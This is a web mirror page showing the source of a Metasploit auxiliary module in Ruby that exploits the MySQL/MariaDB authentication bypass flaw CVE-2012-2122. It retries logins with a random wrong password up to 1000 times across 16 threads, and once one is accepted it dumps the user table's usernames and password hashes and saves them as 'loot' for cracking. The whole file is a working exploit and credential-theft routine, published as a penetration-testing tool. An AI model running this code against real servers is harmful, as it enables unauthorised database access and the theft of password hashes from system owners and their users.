Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb
19848 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'rex/proto/mysql/client'

7


8
class MetasploitModule < Msf::Auxiliary

9
  include Msf::Exploit::Remote::MYSQL

10
  include Msf::Auxiliary::Report

11


12
  include Msf::Auxiliary::Scanner

13


14
  def initialize

15
    super(

16
      'Name' => 'MySQL Authentication Bypass Password Dump',

17
      'Description' => %Q{

18
        This module exploits a password bypass vulnerability in MySQL in order

19
        to extract the usernames and encrypted password hashes from a MySQL server.

20
        These hashes are stored as loot for later cracking.

21


22
        Impacts MySQL versions:

23
        - 5.1.x before 5.1.63

24
        - 5.5.x before 5.5.24

25
        - 5.6.x before 5.6.6

26


27
        And MariaDB versions:

28
        - 5.1.x before 5.1.62

29
        - 5.2.x before 5.2.12

30
        - 5.3.x before 5.3.6

31
        - 5.5.x before 5.5.23

32
      },

33
      'Author' => [

34
        'theLightCosine', # Original hashdump module

35
        'jcran' # Authentication bypass bruteforce implementation

36
      ],

37
      'References' => [

38
        ['CVE', '2012-2122'],

39
        ['OSVDB', '82804'],

40
        ['URL', 'https://www.rapid7.com/blog/post/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/']

41
      ],

42
      'DisclosureDate' => 'Jun 09 2012',

43
      'License' => MSF_LICENSE

44
    )

45


46
    deregister_options('PASSWORD')

47
    register_options([

48
      OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ])

49
    ])

50
  end

51


52
  def run_host(ip)

53
    # Keep track of results (successful connections)

54
    results = []

55


56
    # Username and password placeholders

57
    username = datastore['USERNAME']

58
    password = Rex::Text.rand_text_alpha(rand(8) + 1)

59


60
    # Do an initial check to see if we can log into the server at all

61


62
    begin

63
      socket = connect(false)

64
      close_required = true

65
      mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: socket)

66
      results << mysql_client

67
      close_required = false

68


69
      print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} The server accepted our first login as #{username} with a bad password. URI: mysql://#{username}:#{password}@#{mysql_client.peerhost}:#{mysql_client.peerport}"

70
    rescue ::Rex::Proto::MySQL::Client::HostNotPrivileged

71
      print_error "#{rhost}:#{rport} Unable to login from this host due to policy (may still be vulnerable)"

72
      return

73
    rescue ::Rex::Proto::MySQL::Client::AccessDeniedError

74
      print_good "#{rhost}:#{rport} The server allows logins, proceeding with bypass test"

75
    rescue ::Interrupt

76
      raise $!

77
    rescue ::Exception => e

78
      print_error "#{rhost}:#{rport} Error: #{e}"

79
      return

80
    ensure

81
      socket.close if socket && close_required

82
    end

83


84
    # Short circuit if we already won

85
    if results.length > 0

86
      self.mysql_conn = results.first

87
      return dump_hashes(mysql_client.peerhost, mysql_client.peerport)

88
    end

89


90
    #

91
    # Threaded login checker

92
    #

93
    max_threads = 16

94
    cur_threads = []

95


96
    # Try up to 1000 times just to be sure

97
    queue = [*(1..1000)]

98


99
    while (queue.length > 0)

100
      while (cur_threads.length < max_threads)

101


102
        # We can stop if we get a valid login

103
        break if results.length > 0

104


105
        # keep track of how many attempts we've made

106
        item = queue.shift

107


108
        # We can stop if we reach 1000 tries

109
        break if not item

110


111
        # Status indicator

112
        print_status "#{rhost}:#{rport} Authentication bypass is #{item / 10}% complete" if (item % 100) == 0

113


114
        t = Thread.new(item) do |count|

115
          begin

116
            # Create our socket and make the connection

117
            close_required = true

118
            s = connect(false)

119
            mysql_client = ::Rex::Proto::MySQL::Client.connect(rhost, username, password, nil, rport, io: s)

120


121
            print_good "#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}"

122
            results << mysql_client

123
            close_required = false

124
          rescue ::Rex::Proto::MySQL::Client::AccessDeniedError

125
          rescue ::Exception => e

126
            print_bad "#{rhost}:#{rport} Thread #{count}] caught an unhandled exception: #{e}"

127
          ensure

128
            s.close if socket && close_required

129
          end

130
        end

131


132
        cur_threads << t

133
      end

134


135
      # We can stop if we get a valid login

136
      break if results.length > 0

137


138
      # Add to a list of dead threads if we're finished

139
      cur_threads.each_index do |ti|

140
        t = cur_threads[ti]

141
        if not t.alive?

142
          cur_threads[ti] = nil

143
        end

144
      end

145


146
      # Remove any dead threads from the set

147
      cur_threads.delete(nil)

148


149
      ::IO.select(nil, nil, nil, 0.25)

150
    end

151


152
    # Clean up any remaining threads

153
    cur_threads.each { |x| x.kill }

154


155
    if results.length > 0

156
      print_good("#{mysql_client.peerhost}:#{mysql_client.peerport} Successfully exploited the authentication bypass flaw, dumping hashes...")

157
      self.mysql_conn = results.first

158
      return dump_hashes(mysql_client.peerhost, mysql_client.peerport)

159
    end

160


161
    print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")

162
  end

163


164
  def dump_hashes(host, port)

165
    # Grabs the username and password hashes and stores them as loot

166
    res = mysql_query("SELECT user,password from mysql.user")

167
    if res.nil?

168
      print_error("#{host}:#{port} There was an error reading the MySQL User Table")

169
      return

170


171
    end

172


173
    # Create a table to store data

174
    tbl = Rex::Text::Table.new(

175
      'Header' => 'MysQL Server Hashes',

176
      'Indent' => 1,

177
      'Columns' => ['Username', 'Hash']

178
    )

179


180
    if res.size > 0

181
      res.each do |row|

182
        next unless (row[0].to_s + row[1].to_s).length > 0

183


184
        tbl << [row[0], row[1]]

185
        print_good("#{host}:#{port} Saving HashString as Loot: #{row[0]}:#{row[1]}")

186
      end

187
    end

188


189
    this_service = nil

190
    if framework.db and framework.db.active

191
      this_service = report_service(

192
        :host => host,

193
        :port => port,

194
        :name => 'mysql',

195
        :proto => 'tcp'

196
      )

197
    end

198


199
    report_hashes(tbl.to_csv, this_service, host, port) unless tbl.rows.empty?

200
  end

201


202
  # Stores the Hash Table as Loot for Later Cracking

203
  def report_hashes(hash_loot, service, host, port)

204
    filename = "#{host}-#{port}_mysqlhashes.txt"

205
    path = store_loot("mysql.hashes", "text/plain", host, hash_loot, filename, "MySQL Hashes", service)

206
    print_good("#{host}:#{port} Hash Table has been saved: #{path}")

207
  end

208
end

209


210